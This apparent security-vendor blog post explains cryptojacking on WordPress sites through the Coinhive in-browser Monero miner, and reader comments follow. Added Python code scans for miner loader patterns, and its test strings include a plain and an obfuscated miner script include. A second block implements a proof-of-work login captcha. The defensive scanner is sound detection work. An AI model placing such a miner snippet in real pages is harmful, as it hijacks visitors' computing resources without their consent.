Cryptocurrency Miners Exploiting WordPress Sites
During the last month, the information security media has paid a lot of attention to cryptocurrency mining malware. The Wordfence team has been monitoring the situation, and we are now starting to see attacks attempting to upload mining malware, and site cleaning customers whose sites are already infected.
In this post, you’ll learn what cryptocurrency mining is, what’s in it for the attackers, how to check if you have this problem and what to do about it if you do.
Cryptocurrency Mining Attacks on WordPress
For those of you who aren’t up to speed, cryptocurrencies are digital currencies that can act as an alternative to traditional currencies. Examples include Bitcoin, Litecoin, Ethereum and Monero, among many others. Cryptocurrency mining is a computationally intensive process that contributes to the operation of the cryptocurrency network while generating new currency. It takes a massive amount of computing resources to generate meaningful income. People interested in cryptocurrency mining generally need to invest in expensive equipment and cover the power consumption and heat generated by the hardware.
We spotted the first attack on a WordPress site attempting to embed cryptocurrency mining code on September 17. Attack volume has been very low and unsophisticated so far. However, our Security Services Team is starting to see hacked websites with this malware, so the attackers are beginning to have some success.
The attacks we have analyzed are all attempting to exploit well-known security vulnerabilities that have been around for a long time, for example the Gravity Forms exploit from mid-2016 or the Joomla com_jce exploit from early 2014. We have also seen quite a few attempts to insert mining code using compromised WordPress administrator accounts, as well as some attacks using compromised FTP accounts.
How Attackers Profit From Cryptocurrency Mining Malware
Site owners who place the Coinhive code on their websites earn Monero. The Coinhive code uses site visitors’ computational resources to mine Monero. An attacker can place the Coinhive code on thousands of websites and earn Monero from the mining that happens in site visitors’ browsers.
The following is an example of embedded Coinhive code that will mine Monero currency:
The research team at Check Point analyzed the profit potential for an attacker planting this malware. They concluded that an attacker successful enough to average 1,000 concurrent users across all infected sites would generate $2,398 in monthly revenue.
We think these attacks will grow in popularity very quickly given how lucrative they are. Attacks that attempt to embed cryptomining malware are currently unsophisticated, but we expect to see an increase in the sophistication of attacks as word gets out that this is a lucrative enterprise. We also expect these attacks to target higher-traffic websites, since the potential to profit increases greatly with higher numbers of concurrent site visitors.
How to Check if Your Site Is Infected With Cryptocurrency Mining Malware
The Wordfence firewall blocks attacks attempting to infect sites with this malware. We have added detection capability to Wordfence for cryptominer scripts. This means that the scanner will warn you if it detects this type of script on your site. It also means that the Wordfence firewall will block any uploads that contain the script.
Wordfence Premium customers already have access to this detection capability. Free users will get access to this capability on November 24 via the Community version of the Threat Defense Feed.
It is important to make sure you detect an infection quickly if an attacker should manage to slip through your defenses. Below is an example of a scan finding that would indicate this infection exists on your site.
We have also added detection capabilities to Gravityscan. To run a scan on your site, simply go to the Gravityscan website and run a scan. For best results we recommend that you install the Gravityscan Accelerator.
Below is a scan finding example from Gravityscan.
(If you have intentionally added a cryptominer script to your site, of course, you can simply ignore the finding on either platform.)
Some cryptomining malware may be more hidden or obfuscated, so always pay attention if many of your visitors start reporting poor performance of their browser or computer while visiting your site.
A few hackers have adjusted the miner settings so that the miner uses only a portion of the available CPU power, or so that only one instance of the miner script can run at a time (even if the site is open in multiple tabs).
But many of them are still set to use 100% of available resources, no matter what.
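For site owners who want to check their own theme and plugin files by hand, here is an added example of the kind of check described above (my code, not the Wordfence scanner or its signatures): it searches files for Coinhive and authedmine.com loader indicators and first undoes the two cheapest hiding tricks, string concatenation and JavaScript escape sequences. The coinhive.min.js path and the CoinHive.* class names are assumptions taken from the publicly documented Coinhive loader, not from this post.

```python
import re
from pathlib import Path
from typing import Dict, List

# Indicators of the in-browser Monero miner loaders the post names.
# Assumption: the coinhive.min.js path and CoinHive.* class names follow the
# public Coinhive loader of 2017; the post itself only names the two services.
MINER_PATTERNS = [
    r"coinhive\.com/lib/coinhive\.min\.js",
    r"authedmine\.com/lib/",
    r"CoinHive\.(Anonymous|User|Token)\(",
]

def deobfuscate(text: str) -> str:
    """Undo two cheap hiding tricks: JS \\xNN / \\uNNNN escapes (legal even
    inside identifiers, so \\u0043oinHive is CoinHive) and "coin"+"hive"
    string concatenation."""
    text = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)
    text = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return re.sub(r"""["']\s*\+\s*["']""", "", text)

def scan_text(text: str) -> List[str]:
    """Return the indicator patterns that match once the text is normalised."""
    normalized = deobfuscate(text)
    return [p for p in MINER_PATTERNS if re.search(p, normalized)]

def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk a wp-content/ tree and report every file carrying an indicator."""
    findings: Dict[str, List[str]] = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".php", ".js", ".html"}:
            hits = scan_text(path.read_text(errors="ignore"))
            if hits:
                findings[str(path)] = hits
    return findings

# Constructed samples (not from a real infected site): a normal WordPress
# include, a plain miner include with a placeholder site key, and the same
# miner hidden behind string concatenation and a unicode escape.
CLEAN = '<script src="/wp-includes/js/jquery/jquery.js"></script>'
PLAIN = ('<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
         '<script>var m=new CoinHive.Anonymous("SITEKEY_PLACEHOLDER");m.start();</script>')
OBFUSCATED = (r'<script>var s=document.createElement("script");'
              r's.src="https://coin"+"hive.com/lib/coin"+"hive.min.js";'
              r'document.head.appendChild(s);'
              r'var m=new \u0043oinHive.Anonymous("SITEKEY_PLACEHOLDER");m.start();</script>')
```

Running `scan_tree("wp-content")` lists each file with its matching indicators; the obfuscated sample produces the same findings as the plain one, while heavier packing (eval of base64, custom decoders) would still need a scanner that executes or unpacks the script.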
Changes in Attacker Business Models
New business models are constantly emerging for attackers. Historically, attackers would use compromised websites to generate spam content or spam email. In the past decade, ransomware has gained popularity among attackers, as it allows them to extort money from victims. More recently, using stolen computational resources to mine cryptocurrency has emerged as a way for bad actors to profit from compromised systems.
This emerging business model has now made its way into the WordPress ecosystem as a way for attackers to profit from compromised WordPress websites and the computational resources of website visitors. It is imperative that WordPress site owners deploy a firewall and malware scanner on their sites to quickly detect this new threat and ensure that their site visitors’ resources are not hijacked to mine cryptocurrency.
What to Do If Your Site Is Infected With Cryptocurrency Mining Malware
The most reliable way to recover if your website is hacked is to use our site cleaning service. Our team of experts will clean your site and get it back online as quickly as possible, and the service includes a detailed report and a 90-day guarantee. You can also use the Wordfence site security audit to do a comprehensive security inspection of your website.
If you choose to attempt to fix any infection yourself, you can follow our guide to fixing a hacked website with Wordfence.
11 Comments on “Cryptocurrency Miners Exploiting WordPress Sites”
Joe Levi, October 26, 2017 at 11:04 am
It should be noted that Coinhive (and its adblocker-friendly authedmine.com) are NOT the problem here. Legitimate sites, faced with declining revenue, have placed cryptominers on their sites to offset this loss of ad revenue. Yes, some hackers are hijacking this, and THAT is bad, but the presence of the code is not an indication of an infection.
Example #1: I have a page dedicated to people who want to support my efforts. On that page you can make a PayPal donation, click through to Amazon using my affiliate code, and there’s a Coinhive cryptominer there, too. Go take a look: http://www.JoeLevi.com/thanks.html
Example #2: There is a concept called “proof of work” which essentially runs a pre-determined number of computations. Once that threshold has been met and submitted, a value is returned. This can be set up to operate as a Captcha. If someone wants to log in to your site, just like Google’s “I am not a robot” captcha, this method could be used to incur a compute expense on the PC of the person logging in. This not only slows down brute-force login attempts on your site, but for a bot that’s brute-forcing to have to spend thousands of compute cycles per login, this kind of captcha can help reduce the impact on OTHER (non-captcha’d) login pages, too.
In conclusion, there are some very legitimate use-case scenarios which can be employed through this type of technology. Sure, some people are exploiting it, and some people are hijacking. The article doesn’t offer this perspective, so I wanted to provide this information for the reader’s consideration.
– Joe Levi, Redoubt Solutions, LLC
Security and Information Services
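Joe’s second example, the proof-of-work login captcha, carried through as an added example in a hashcash style (my code, not the commenter’s or Wordfence’s): the server issues a challenge bound to the account with an HMAC, the client spends CPU finding a counter whose SHA-256 hash has the required number of leading zero bits, and the server verifies with a single hash. The difficulty, the field layout and the HMAC binding are my assumptions.

```python
import hashlib
import hmac
import secrets
import time

# Assumption: a per-server secret kept out of the database; rotating it simply
# invalidates outstanding challenges. 16 bits means ~65k hashes on average.
SERVER_KEY = secrets.token_bytes(32)
DIFFICULTY_BITS = 16

def _tag(username: str, nonce: str, issued: str) -> str:
    return hmac.new(SERVER_KEY, f"{username}|{nonce}|{issued}".encode(), "sha256").hexdigest()

def issue_challenge(username: str) -> dict:
    """Server side: a random nonce bound to the account and the issue time, so
    the client can neither pick an easier challenge nor move a solution
    between accounts. No server state is needed."""
    nonce, issued = secrets.token_hex(16), str(int(time.time()))
    return {"username": username, "nonce": nonce, "issued": issued,
            "tag": _tag(username, nonce, issued)}

def leading_zero_bits(digest: bytes) -> int:
    return len(digest) * 8 - int.from_bytes(digest, "big").bit_length()

def _work(challenge: dict, counter: int) -> bytes:
    return hashlib.sha256(f"{challenge['nonce']}|{challenge['username']}|{counter}".encode()).digest()

def solve(challenge: dict, bits: int = DIFFICULTY_BITS) -> int:
    """Client side (the browser, in Joe's scenario): the only expensive step."""
    counter = 0
    while leading_zero_bits(_work(challenge, counter)) < bits:
        counter += 1
    return counter

def verify(challenge: dict, counter: int, bits: int = DIFFICULTY_BITS,
           max_age: int = 300) -> bool:
    """Server side: one HMAC and one SHA-256, however much the client spent."""
    expected = _tag(challenge["username"], challenge["nonce"], challenge["issued"])
    if not hmac.compare_digest(expected, challenge["tag"]):
        return False                      # tampered or forged challenge
    if time.time() - int(challenge["issued"]) > max_age:
        return False                      # stale; forces fresh work per attempt
    return leading_zero_bits(_work(challenge, counter)) >= bits
```

A production server would additionally remember nonces it has already accepted within `max_age`, because a purely stateless check lets one solution be replayed until the challenge expires.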
Mark Maunder, October 26, 2017 at 11:43 am
Thanks for your input Joe.
Otto, October 26, 2017 at 3:41 pm
Joe Levi, these things could have been implemented correctly in the first place. Instead, coin-hive made a rather foolish mistake, and now people are treating it as malware because that is in fact the main use of this code. The “legit” cases of coin-hive are less than 1% of the total. People are exploiting it and the bottom line is simple: Browser based coin mining is now officially a menace, and it will never be considered in any way legitimate ever again. It will be blocked, it will be incorrectly called a “virus”, and it will be banned in all possible ways.
It’s dead tech before it even started because of this poor, poor implementation.
Joe Levi, November 2, 2017 at 10:59 am
Otto, I hear what you’re saying, but I’d like to see if I can put it in the context of something we already know to see if it might change your opinion.
Today we have ads on our sites which are delivered by any number of providers. These ads began as pictures, adding extra load-time and bandwidth to the pages the users load. They didn’t ask for this. They weren’t given the ability to “opt-in”. Their bandwidth was “stolen”, their compute cycles were “stolen”, and their screen real-estate was forcefully “occupied” by an ad they didn’t ask for.
What’s worse, since these images were served by other systems (not the site which the user was visiting), all their IP and header data were available to this 3rd party – again, without option.
But it wasn’t just pictures which were being served. It was Flash/Shockwave objects, which were mini-programs which could monitor activity on the page. Again, without option.
Now, it’s not Flash as much as it is IFRAMES – entire web pages with pictures, scripts, css, cookies, and more. All this delivered without asking if they can use your bandwidth, your compute cycles, your screen real-estate, or your disk’s storage space.
That’s the state of ads today – but no one seems to care.
Did advertisers make the same “foolish mistake” which you argue Coinhive did by not forcing a pre-load opt-in? Should people treat ad networks as “malware”, because they, like Coinhive, use your system resources without your explicit authorization? Are people not “exploiting” ad networks now in the same way which you argue they’re “exploiting” Monero mining?
Aren’t ad networks now “officially a menace, and it will never be considered in any way legitimate ever again”, based on the same arguments you made about Coinhive?
Shouldn’t people also want to block ad networks, call ad networks a “virus”, and ban them “in all possible ways”?
Why aren’t ad networks “dead tech before it even started because of this poor, poor implementation”?
I ask these questions not to argue, but to open the conversation about the resources which are currently being sequestered by ad networks (which nobody seems to care about), and to try to determine why that is somehow an acceptable non-optional use of resources, but crypto-mining is somehow not.
– Joe Levi, Redoubt Solutions, LLC
Security and Information Services
Brendon, November 1, 2017 at 11:03 am
If I’m visiting a website that has cryptocurrency miners running on it, unbeknownst to site visitors, I want to know about it. Sure, you can argue this is another form of advertising as it generates revenue for sites suffering from ad blocker usage, but IMHO it’s an underhanded method.
Moreover, WordPress sites tend to have a lot of embedded code in the pages due to WP add-ons that require it to run. As a website admin and user, I don’t think it’s a good idea to be impacting page load times further with extra page code that the browser needs to load/interpret.
In sum: this is not a best practice.
Justin Germino, October 26, 2017 at 11:07 am
Obviously any hack/exploit is bad, and someone hacking thousands of sites to gain the benefit of mining is likely going to go unnoticed longer than a hacked site that redirects or pops up spam/malware, so this is a more subtle way of stealing off of other sites’ traffic.
I do think that in general cryptomining on sites as a means of revenue may be a good alternative if done legitimately with disclaimers, as a way to go banner-ad free and remove advertisements to create an alternative revenue source, but only for sites you own/manage of course.
Quentin, October 26, 2017 at 11:10 am
Monero as a cryptocurrency has a lot of potential and some really good tech, and in-browser mining has some legitimate uses. Sad to see it abused this way; it gives both browser mining and Monero bad reputations that they don’t deserve. Thanks for adding checks for these to the scanner, hopefully with enough awareness and pressure the bad actors will find it too much trouble and move on to something else.
Ross Heitkamp, October 26, 2017 at 11:22 am
This is good information about a possible new hack on our sites. But, since this is really “infecting” visitors to sites, I would like to learn more about being able to detect that as a visitor – not just by noticing higher CPU usage. I often have many tabs open and do sometimes notice my CPU pegged and give up, but which site should I now avoid? Tools to empower visitors would create a natural boycott to make this unsuccessful.
rfrazier, October 26, 2017 at 12:34 pm
Hi guys. I had uncovered information about this coin mining in browsers becoming a problem in my security research and was literally just about to write to you all about it today. I’m glad you’re aware of and on top of the problem. As a user, I’m very leery of this and have already installed a Firefox plugin to prevent coin mining in my browser. Even if website owners intentionally add mining code to their site with the best of intentions, it’s very possible, even likely, that they would get low quality or abusive or even malicious code running on their sites which would harm the users. As a user, I MIGHT permit mining in my browser if a) I REALLY like the site. b) They give me great free content while encouraging me to provide revenue. c) They get my EXPLICIT permission to mine. d) They GUARANTEE where the money goes and honor that. e) They let me set the max CPU usage per tab and per site in 1% increments and honor that. f) They let me decide whether background operation is permitted, assuming it’s even possible. g) They permit me to change or revoke my permissions at any time and honor that. and h) They use only reputable / credible mining providers. If I clear out my history and cookies (assuming cookies are used) and go back to the site, it should NOT mine, and should get my EXPLICIT permission all over again. Note that for many desktop computers in the continental USA, pegging the CPU will use about 100 W of extra power and, if done 24 / 7, will cost about $7 / month extra on your electric bill. This obviously depends on the PC, and the electric billing rate. Note also that pegging the CPU will cause your computer’s performance and responsiveness to go down the drain.
Thanks for all the good work you all do.
Jarrod, October 27, 2017 at 4:08 am
I agree with Joe. He summed it up right there.
Wil, November 2, 2017 at 7:44 pm
I’m also intrigued to see where this goes as regards bad actors abusing a legitimate service.
I find that the Chrome extension minerBlock is working well at detecting pages that are running these mining scripts. Haven’t detected a whole lot just now, but they are certainly out there.
Good to hear that Wordfence is now scanning for these.